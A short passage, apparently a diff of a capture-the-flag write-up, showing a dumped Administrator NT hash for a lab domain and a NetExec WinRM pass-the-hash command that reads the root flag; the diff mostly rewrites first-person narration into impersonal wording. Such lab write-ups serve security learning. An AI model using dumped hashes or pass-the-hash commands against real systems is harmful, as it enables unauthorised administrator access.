Skip to main content

 Administrator:500:aad3b435b51404eeaad3b435b51404ee:ec17f7a2a4d96e177bfd101b94ffc0a7:::

 Perfect!
-I now have the Administrator’s NT hash: ec17f7a2a4d96e177bfd101b94ffc0a7.
-With this, I can authenticate as the domain administrator.
+The Administrator’s NT hash is now available: ec17f7a2a4d96e177bfd101b94ffc0a7.
+With this, authenticating as the domain administrator is straightforward.

-Root Flag Acquisition#
+Root Flag Acquisition

-Let me use the administrator hash to authenticate via WinRM and grab the root flag.
+Using the administrator hash to authenticate via WinRM and grab the root flag.
 The -H flag tells NetExec to use the NT hash for authentication.

 elliot@exegol:~$ nxc winrm redelegate.vl -u Administrator -H ec17f7a2a4d96e177bfd101b94ffc0a7 -X 'cat C:\Users\Administrator\Desktop\root.txt'